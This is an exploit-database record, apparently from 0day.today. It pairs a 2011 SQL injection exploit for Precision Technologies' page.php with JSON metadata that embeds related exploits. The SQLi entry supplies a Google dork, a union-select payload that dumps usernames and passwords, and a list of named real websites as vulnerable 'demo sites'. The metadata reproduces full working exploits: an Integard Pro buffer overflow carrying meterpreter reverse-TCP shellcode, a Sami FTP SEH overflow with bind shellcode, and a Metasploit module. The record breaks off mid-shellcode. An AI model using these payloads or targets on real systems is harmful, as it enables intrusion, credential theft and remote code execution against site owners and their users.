ID 1337DAY-ID-16702
Type zdt
Reporter Angel Injection
Modified 2011-08-17T00:00:00
Description
Exploit for the PHP platform, in the web applications category
# Exploit Title: Precision Technologies (page.php) SQL Injection Vulnerability
# Date: 17/8/2011
# Author: Angel Injection
# Home Page: http://www.club-h.co.cc , http://www.sec-krb.org
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: http://www.pretechno.com
# Version: N/A
# Category: webapps
# Google dork: intext:"powered by Precision Technologies" inurl:"page.php?id="
# Tested on: BackTrack 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit
http://localhost/page.php?id=1'
http://localhost/page.php?id=1[injection here]
http://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--
Demo sites
http://www.cibmrd.com/page.php?id=%27
http://www.nirmaltours.com/page.php?id=1%27
http://prakritiwomen.org/page.php?id=1
http://www.cardicareaipc.com/page.php?id=1%27
http://www.opaquegroup.com/page.php?id=1%27
http://synergy-pune.com/page.php?id=1%27
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq and the Club Hack Team
# 0day.today [2018-01-02] #
{"hash": "13e75e3e44f57cd40c9c5b2a0fc7ccd7e0b4e767061ab04d5038d3f6cc13f381", "id": "1337DAY-ID-16702", "lastseen": "2018-01-02T15:11:11", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "690d9db3ae63ffd6f45bb4e90e40feb8", "key": "href"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "063fd817357f541bf662443325af39b8", "key": "reporter"}, {"hash": "7f5f6d74696e9cc21c02036b57303215", "key": "sourceData"}, {"hash": "e9803e767123e6c725d382e25aa6d5a0", "key": "sourceHref"}, {"hash": "e59a9991323c7e74eb5d2d1e4f2d2002", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2018-01-02T15:11:11"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:139468", "PACKETSTORM:83185"]}, {"type": "zdt", "idList": ["1337DAY-ID-26196", "1337DAY-ID-25670", "1337DAY-ID-17835", "1337DAY-ID-16370", "1337DAY-ID-8215", "1337DAY-ID-9179", "1337DAY-ID-1462"]}, {"type": "exploitdb", "idList": ["EDB-ID:40675", "EDB-ID:16702", "EDB-ID:3140", "EDB-ID:3127", "EDB-ID:1462", "EDB-ID:1448"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/SAMI_FTPD_USER"]}, {"type": "cve", "idList": ["CVE-2006-0441"]}, {"type": "canvas", "idList": ["SAMIFTP"]}, {"type": "osvdb", "idList": ["OSVDB:22734"]}], "modified": "2018-01-02T15:11:11"}, "vulnersScore": 5.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16702", "description": "Exploit for php platform in category web 
applications", "title": "Precision Technologies(page.php)sql Injection Vulnerability", "history": [{"bulletin": {"hash": "78a78cdc42a988cbfffed21d80031987b91ad3d9326d5dfb19e69f15a843adeb", "id": "1337DAY-ID-16702", "lastseen": "2016-04-19T01:43:21", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-19T01:43:21"}}, "hashmap": [{"hash": "d19f3922d236744324f3e986d7f25e30", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c12021b2e1bbd351fb41d3e36c09c84e", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e59a9991323c7e74eb5d2d1e4f2d2002", "key": "title"}, {"hash": "063fd817357f541bf662443325af39b8", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "a880f11e2ef82d7191d49e77f81d07fa", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16702", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Precision Technologies(page.php)sql Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability\r\n# Date: 17/8/2011\r\n# Author: Angel Injection\r\n# home Page: http://www.club-h.co.cc , http://www.sec-krb.org\r\n# Email: Angel-Injection[at]hotmail.com\r\n# Vendor or Software Link: http://www.pretechno.com\r\n# Version: N/A\r\n# Category:: webapps\r\n# Google dork: intext:\"powered by Precision Technologies\" inurl:\"page.php?id=\"\r\n# Tested on: 
Back Track 5\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nExploit\r\n\r\nhttp://localhost/page.php?id=1'\r\n\r\nhttp://localhost/page.php?id=1[injection here]\r\n\r\nhttp://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--\r\n\r\nDemo sites\r\nhttp://www.cibmrd.com/page.php?id=%27\r\nhttp://www.nirmaltours.com/page.php?id=1%27\r\nhttp://prakritiwomen.org/page.php?id=1\r\nhttp://www.cardicareaipc.com/page.php?id=1%27\r\nhttp://www.opaquegroup.com/page.php?id=1%27\r\nhttp://synergy-pune.com/page.php?id=1%27\r\n\r\n\r\n-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----\r\nThanks to all the people of Iraq And Club Hack Team\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Angel Injection", "modified": "2011-08-17T00:00:00", "href": "http://0day.today/exploit/description/16702"}, "lastseen": "2016-04-19T01:43:21", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability\r\n# Date: 17/8/2011\r\n# Author: Angel Injection\r\n# home Page: http://www.club-h.co.cc , http://www.sec-krb.org\r\n# Email: Angel-Injection[at]hotmail.com\r\n# Vendor or Software Link: http://www.pretechno.com\r\n# Version: N/A\r\n# Category:: webapps\r\n# Google dork: intext:\"powered by Precision Technologies\" inurl:\"page.php?id=\"\r\n# Tested on: Back Track 5\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nExploit\r\n\r\nhttp://localhost/page.php?id=1'\r\n\r\nhttp://localhost/page.php?id=1[injection here]\r\n\r\nhttp://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--\r\n\r\nDemo 
sites\r\nhttp://www.cibmrd.com/page.php?id=%27\r\nhttp://www.nirmaltours.com/page.php?id=1%27\r\nhttp://prakritiwomen.org/page.php?id=1\r\nhttp://www.cardicareaipc.com/page.php?id=1%27\r\nhttp://www.opaquegroup.com/page.php?id=1%27\r\nhttp://synergy-pune.com/page.php?id=1%27\r\n\r\n\r\n-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----\r\nThanks to all the people of Iraq And Club Hack Team\r\n\r\n\n\n# 0day.today [2018-01-02] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Angel Injection", "modified": "2011-08-17T00:00:00", "href": "https://0day.today/exploit/description/16702"}
{"packetstorm": [{"lastseen": "2019-12-07T02:20:37", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155578", "href": "https://packetstormsecurity.com/files/155578/Integard-Pro-NoJs-2.2.0.9026-Remote-Buffer-Overflow.html", "title": "Integard Pro NoJs 2.2.0.9026 Remote Buffer Overflow", "type": "packetstorm", "sourceData": "`Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow \nDate: 2019-09-22 \nExploit Author: purpl3f0xsecur1ty \nVendor Homepage: https://www.tucows.com/ \nSoftware Link: http://www.tucows.com/preview/519612/Integard-Home \nVersion: Pro 2.2.0.9026 / Home 2.0.0.9021 \nTested on: Windows XP / Win7 / Win10 \nCVE: CVE-2019-16702 \n \n#!/usr/bin/python \n######################################################## \n#~Integard Pro 2.2.0.9026 \"NoJs\" EIP overwrite exploit~# \n#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~# \n# The vulnerability: Integard fails to sanitize input # \n# to the \"NoJs\" parameter in an HTTP POST request, # \n# resulting in a stack buffer overflow that overwrites # \n# the instruction pointer, leading to remote code # \n# execution. # \n######################################################## \n \nimport socket \nimport os \nimport sys \nfrom struct import pack \n \ndef main(): \nprint \"~*Integard RCE Exploit for XP/7/10*~\" \nprint \"Chose target: (Enter number only)\" \nprint \"1) - Windows XP\" \nprint \"2) - Windows 7/10\" \ntarget = str(input()) \nhost = \"10.0.0.130\" \nport = 18881 \n \n#################################################### \n# Integard's functionality interferes with reverse # \n# and bind shells. Only Meterpreter seems to work. 
# \n#################################################### \n \n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001 \n# -b \"\\x00\\x26\\x2f\\x3d\\x3f\\x5c\" -f python -v meterpreter EXITFUNC=thread \nmeterpreter = \"\\x90\" * 50 \nmeterpreter += \"\\xda\\xcd\\xbe\\xa2\\x51\\xce\\x97\\xd9\\x74\\x24\\xf4\" \nmeterpreter += \"\\x5f\\x2b\\xc9\\xb1\\x5b\\x83\\xef\\xfc\\x31\\x77\\x15\" \nmeterpreter += \"\\x03\\x77\\x15\\x40\\xa4\\x32\\x7f\\x06\\x47\\xcb\\x80\" \nmeterpreter += \"\\x66\\xc1\\x2e\\xb1\\xa6\\xb5\\x3b\\xe2\\x16\\xbd\\x6e\" \nmeterpreter += \"\\x0f\\xdd\\x93\\x9a\\x84\\x93\\x3b\\xac\\x2d\\x19\\x1a\" \nmeterpreter += \"\\x83\\xae\\x31\\x5e\\x82\\x2c\\x4b\\xb3\\x64\\x0c\\x84\" \nmeterpreter += \"\\xc6\\x65\\x49\\xf8\\x2b\\x37\\x02\\x77\\x99\\xa8\\x27\" \nmeterpreter += \"\\xcd\\x22\\x42\\x7b\\xc0\\x22\\xb7\\xcc\\xe3\\x03\\x66\" \nmeterpreter += \"\\x46\\xba\\x83\\x88\\x8b\\xb7\\x8d\\x92\\xc8\\xfd\\x44\" \nmeterpreter += \"\\x28\\x3a\\x8a\\x56\\xf8\\x72\\x73\\xf4\\xc5\\xba\\x86\" \nmeterpreter += \"\\x04\\x01\\x7c\\x78\\x73\\x7b\\x7e\\x05\\x84\\xb8\\xfc\" \nmeterpreter += \"\\xd1\\x01\\x5b\\xa6\\x92\\xb2\\x87\\x56\\x77\\x24\\x43\" \nmeterpreter += \"\\x54\\x3c\\x22\\x0b\\x79\\xc3\\xe7\\x27\\x85\\x48\\x06\" \nmeterpreter += \"\\xe8\\x0f\\x0a\\x2d\\x2c\\x4b\\xc9\\x4c\\x75\\x31\\xbc\" \nmeterpreter += \"\\x71\\x65\\x9a\\x61\\xd4\\xed\\x37\\x76\\x65\\xac\\x5f\" \nmeterpreter += \"\\xbb\\x44\\x4f\\xa0\\xd3\\xdf\\x3c\\x92\\x7c\\x74\\xab\" \nmeterpreter += \"\\x9e\\xf5\\x52\\x2c\\x96\\x11\\x65\\xe2\\x10\\x71\\x9b\" \nmeterpreter += \"\\x03\\x61\\x58\\x58\\x57\\x31\\xf2\\x49\\xd8\\xda\\x02\" \nmeterpreter += \"\\x75\\x0d\\x76\\x08\\xe1\\xa4\\x87\\x0c\\x71\\xd0\\x85\" \nmeterpreter += \"\\x0c\\x52\\x08\\x03\\xea\\xc4\\x1a\\x43\\xa2\\xa4\\xca\" \nmeterpreter += \"\\x23\\x12\\x4d\\x01\\xac\\x4d\\x6d\\x2a\\x66\\xe6\\x04\" \nmeterpreter += \"\\xc5\\xdf\\x5f\\xb1\\x7c\\x7a\\x2b\\x20\\x80\\x50\\x56\" \nmeterpreter += 
\"\\x62\\x0a\\x51\\xa7\\x2d\\xfb\\x10\\xbb\\x5a\\x9c\\xda\" \nmeterpreter += \"\\x43\\x9b\\x09\\xdb\\x29\\x9f\\x9b\\x8c\\xc5\\x9d\\xfa\" \nmeterpreter += \"\\xfb\\x4a\\x5d\\x29\\x78\\x8c\\xa1\\xac\\x49\\xe7\\x94\" \nmeterpreter += \"\\x3a\\xf6\\x9f\\xd8\\xaa\\xf6\\x5f\\x8f\\xa0\\xf6\\x37\" \nmeterpreter += \"\\x77\\x91\\xa4\\x22\\x78\\x0c\\xd9\\xff\\xed\\xaf\\x88\" \nmeterpreter += \"\\xac\\xa6\\xc7\\x36\\x8b\\x81\\x47\\xc8\\xfe\\x91\\x80\" \nmeterpreter += \"\\x36\\x7d\\xbe\\x28\\x5f\\x7d\\xfe\\xc8\\x9f\\x17\\xfe\" \nmeterpreter += \"\\x98\\xf7\\xec\\xd1\\x17\\x38\\x0d\\xf8\\x7f\\x50\\x84\" \nmeterpreter += \"\\x6d\\xcd\\xc1\\x99\\xa7\\x93\\x5f\\x9a\\x44\\x08\\x6f\" \nmeterpreter += \"\\xe1\\x25\\xaf\\x90\\x16\\x2c\\xd4\\x90\\x17\\x50\\xea\" \nmeterpreter += \"\\xad\\xce\\x69\\x98\\xf0\\xd3\\xcd\\x83\\xee\\xf9\\x3b\" \nmeterpreter += \"\\x2c\\xb7\\x68\\x86\\x31\\x48\\x47\\xc5\\x4f\\xcb\\x6d\" \nmeterpreter += \"\\xb6\\xab\\xd3\\x04\\xb3\\xf0\\x53\\xf5\\xc9\\x69\\x36\" \nmeterpreter += \"\\xf9\\x7e\\x89\\x13\" \n \nif target == \"1\": \nprint \"[*] Sending Windows XP payload using meterpreter/reverse_tcp\" \n# JMP ESP at 0x3E087557 in iertutil.dll \ncrash = \"A\" * 512 \ncrash += pack(\"<L\",0x3E087557) \ncrash += meterpreter \ncrash += \"C\" * (1500 - len(crash)) \n \nbuffer = \"\" \nbuffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\" \nbuffer += \"Host: 10.0.0.130:18881\\r\\n\" \nbuffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\" \nbuffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\" \nbuffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\" \nbuffer += \"Accept-Encoding: gzip, deflate\\r\\n\" \nbuffer += \"Referer: http://10.0.0.130:18881/\\r\\n\" \nbuffer += \"Connection: close\\r\\n\" \nbuffer += \"Upgrade-Insecure-Requests: 1\\r\\n\" \nbuffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \nbuffer += \"Content-Length: 78\\r\\n\\r\\n\" \nbuffer += 
\"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\" \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((host,port)) \ns.send(buffer) \ns.close() \nprint \"[*] Done\" \n \nif target == \"2\": \nprint \"[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp\" \n \n# ASLR IS ON!!! MUST USE NON-ASLR MODULE! \n# POP POP RET in integard.exe (ASLR disabled) \nnSEH = \"\\xEB\\xD0\\x90\\x90\" # Jump 48 bytes backwards \nSEH = pack(\"<L\",0x004042B0) \n \njumpCall = \"\\xEB\\x09\" # Jump 11 bytes forward to hit the CALL in bigBackJump \nbigBackJump = \"\\x59\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFF\\xE1\\xE8\\xF2\\xFF\\xFF\\xFF\" \n \ncrash = \"\\x90\" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50) \ncrash += meterpreter \ncrash += \"\\x90\" * 50 \ncrash += jumpCall \ncrash += bigBackJump \ncrash += nSEH \ncrash += SEH \n \n \nbuffer = \"\" \nbuffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\" \nbuffer += \"Host: 10.0.0.130:18881\\r\\n\" \nbuffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\" \nbuffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\" \nbuffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\" \nbuffer += \"Accept-Encoding: gzip, deflate\\r\\n\" \nbuffer += \"Referer: http://10.0.0.130:18881/\\r\\n\" \nbuffer += \"Connection: close\\r\\n\" \nbuffer += \"Upgrade-Insecure-Requests: 1\\r\\n\" \nbuffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \nbuffer += \"Content-Length: 78\\r\\n\\r\\n\" \nbuffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\" \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((host,port)) \ns.send(buffer) \ns.close() \nprint \"[*] Done\" \n \nmain() \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/155578/integardpronojs2209026-overflow.txt"}, {"lastseen": "2016-12-05T22:17:22", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "id": "PACKETSTORM:139468", "href": "https://packetstormsecurity.com/files/139468/KarjaSoft-Sami-FTP-Server-2.0.2-Buffer-Overflow.html", "title": "KarjaSoft Sami FTP Server 2.0.2 Buffer Overflow", "type": "packetstorm", "sourceData": "`#/usr/bin/python \n#-*- Coding: utf-8 -*- \n \n### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### \n \n# Date: 2016-01-11 \n# Exploit Author: n30m1nd \n# Vendor Homepage: http://www.karjasoft.com/ \n# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe \n# Version: 2.0.2 \n# Tested on: Win7 64bit and Win10 64 bit \n \n# Credits \n# ======= \n# Thanks to PHRACK for maintaining all the articles up for so much time... \n# These are priceless and still current for exploit development!! \n# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better \n \n# How to \n# ====== \n# * Open Sami FTP Server and open its graphical interface \n# * Run this python script and write the IP to attack \n# * Connect to the same IP on port 4444 \n# \n# BONUS \n# ===== \n# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each \n# start and so, it will crash and run our shellcode everytime it starts. \n \n# Why? 
\n# ==== \n# The graphical interface tries to show the user name which produces an overflow overwriting SEH \n \n# Exploit code \n# ============ \n \nimport socket \nimport struct \n \ndef doHavoc(ipaddr): \n# Bad chars: 00 0d 0a ff \nalignment = \"\\x90\"*3 \n \njmpfront = \"345A7504\".decode('hex') \n#CPU Disasm \n#Hex dump Command \n# 34 5A XOR AL,5A \n# 75 04 JNE SHORT +04 \n \n# pop pop ret in tmp01.dll \npopret = 0x10022ADE \n \n# fstenv trick to get eip: phrack number 62 \n# and store it into EAX for the metasploit shell (BufferRegister) \ngetEIPinEAX = \"D9EED934E48B44E40C040b\".decode('hex') \n#CPU Disasm \n#Hex dump Command \n# D9EE FLDZ \n# D934E4 FSTENV SS:[ESP] \n# 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C] \n# 04 0B ADD AL,0B \n \n# Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX \nshellcode = ( \ngetEIPinEAX + \n\"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p\" \n\"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq\" \n\"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc\" \n\"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ\" \n\"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb\" \n\"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9\" \n\"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP\" \n\"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq\" \n\"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6\" \n\"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm\" \n\"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3\" \n\"ioJuAA\" \n) \n \n# Final payload, SEH overwrite ocurrs at 600 bytes \npayload = alignment + \".\"*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack(\"<L\", popret) + shellcode \ntry: \ns = socket.create_connection((ipaddr, 21)) \ns.send(\"USER \"+ payload +\"\\r\\n\" ) \nprint s.recv(4096) \n \ns.send(\"PASS \"+ payload +\"\\r\\n\" ) \nprint s.recv(4096) 
\nprint s.recv(4096) \nexcept e: \nprint str(e) \nexit(\"[+] Couldn't connect\") \n \nif __name__ == \"__main__\": \nipaddr = raw_input(\"[+] IP: \") \ndoHavoc(ipaddr) \nwhile raw_input(\"[?] Got shell?(y/n) \").lower() == \"n\": \ndoHavoc(ipaddr) \nprint \"[+] Enjoy...\" \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139468/karjasoftsamiftp-overflow.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:14:58", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83185/KarjaSoft-Sami-FTP-Server-v2.02-USER-Overflow.html", "id": "PACKETSTORM:83185", "type": "packetstorm", "title": "KarjaSoft Sami FTP Server v2.02 USER Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'KarjaSoft Sami FTP Server v2.02 USER Overflow', \n'Description' => %q{ \nThis module exploits the KarjaSoft Sami FTP Server version 2.02 \nby sending an excessively long USER string. The stack is overwritten \nwhen the administrator attempts to view the FTP logs. Therefore, this exploit \nis passive and requires end-user interaction. Keep this in mind when selecting \npayloads. When the server is restarted, it will re-execute the exploit until \nthe logfile is manually deleted via the file system. 
\n}, \n'Author' => [ 'patrick' ], \n'Arch' => [ ARCH_X86 ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'Stance' => Msf::Exploit::Stance::Passive, \n'References' => \n[ \n# This exploit appears to have been reported multiple times. \n[ 'CVE', '2006-0441'], \n[ 'CVE', '2006-2212'], \n[ 'OSVDB', '25670'], \n[ 'BID', '16370'], \n[ 'BID', '22045'], \n[ 'BID', '17835'], \n[ 'URL', 'http://www.milw0rm.com/exploits/1448'], \n[ 'URL', 'http://www.milw0rm.com/exploits/1452'], \n[ 'URL', 'http://www.milw0rm.com/exploits/1462'], \n[ 'URL', 'http://www.milw0rm.com/exploits/3127'], \n[ 'URL', 'http://www.milw0rm.com/exploits/3140'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Platform' => ['win'], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 300, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\\xff\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll \n[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll \n[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll \n[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll \n], \n'DisclosureDate' => 'Jan 24 2006')) \n \nregister_options( \n[ \nOpt::RPORT(21), \n], self.class) \nend \n \ndef check \nconnect \nbanner = sock.get(-1,3) \ndisconnect \n \nif (banner =~ /Sami FTP Server 2.0.2/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nsploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret) \n \nlogin = \"USER #{sploit}\\r\\n\" \nlogin << \"PASS \" + Rex::Text.rand_char(payload_badchars) \n \nsock.put(login + \"\\r\\n\") \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83185/sami_ftpd_user.rb.txt", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2019-12-06T16:00:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33629", "href": "https://0day.today/exploit/description/33629", "title": "Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow\r\nExploit Author: purpl3f0xsecur1ty\r\nVendor Homepage: https://www.tucows.com/\r\nSoftware Link: http://www.tucows.com/preview/519612/Integard-Home\r\nVersion: Pro 2.2.0.9026 / Home 2.0.0.9021\r\nTested on: Windows XP / Win7 / Win10\r\nCVE: CVE-2019-16702\r\n\r\n#!/usr/bin/python\r\n########################################################\r\n#~Integard Pro 2.2.0.9026 \"NoJs\" EIP overwrite exploit~#\r\n#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#\r\n# The vulnerability: Integard fails to sanitize input #\r\n# to the \"NoJs\" parameter in an HTTP POST request, #\r\n# resulting in a stack buffer overflow that overwrites #\r\n# the instruction pointer, leading to remote code #\r\n# execution. #\r\n########################################################\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\nfrom struct import pack\r\n\r\ndef main():\r\n print \"~*Integard RCE Exploit for XP/7/10*~\"\r\n print \"Chose target: (Enter number only)\"\r\n print \"1) - Windows XP\"\r\n print \"2) - Windows 7/10\"\r\n target = str(input())\r\n host = \"10.0.0.130\"\r\n port = 18881\r\n\r\n ####################################################\r\n # Integard's functionality interferes with reverse #\r\n # and bind shells. Only Meterpreter seems to work. 
#\r\n ####################################################\r\n\r\n # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001\r\n # -b \"\\x00\\x26\\x2f\\x3d\\x3f\\x5c\" -f python -v meterpreter EXITFUNC=thread\r\n meterpreter = \"\\x90\" * 50\r\n meterpreter += \"\\xda\\xcd\\xbe\\xa2\\x51\\xce\\x97\\xd9\\x74\\x24\\xf4\"\r\n meterpreter += \"\\x5f\\x2b\\xc9\\xb1\\x5b\\x83\\xef\\xfc\\x31\\x77\\x15\"\r\n meterpreter += \"\\x03\\x77\\x15\\x40\\xa4\\x32\\x7f\\x06\\x47\\xcb\\x80\"\r\n meterpreter += \"\\x66\\xc1\\x2e\\xb1\\xa6\\xb5\\x3b\\xe2\\x16\\xbd\\x6e\"\r\n meterpreter += \"\\x0f\\xdd\\x93\\x9a\\x84\\x93\\x3b\\xac\\x2d\\x19\\x1a\"\r\n meterpreter += \"\\x83\\xae\\x31\\x5e\\x82\\x2c\\x4b\\xb3\\x64\\x0c\\x84\"\r\n meterpreter += \"\\xc6\\x65\\x49\\xf8\\x2b\\x37\\x02\\x77\\x99\\xa8\\x27\"\r\n meterpreter += \"\\xcd\\x22\\x42\\x7b\\xc0\\x22\\xb7\\xcc\\xe3\\x03\\x66\"\r\n meterpreter += \"\\x46\\xba\\x83\\x88\\x8b\\xb7\\x8d\\x92\\xc8\\xfd\\x44\"\r\n meterpreter += 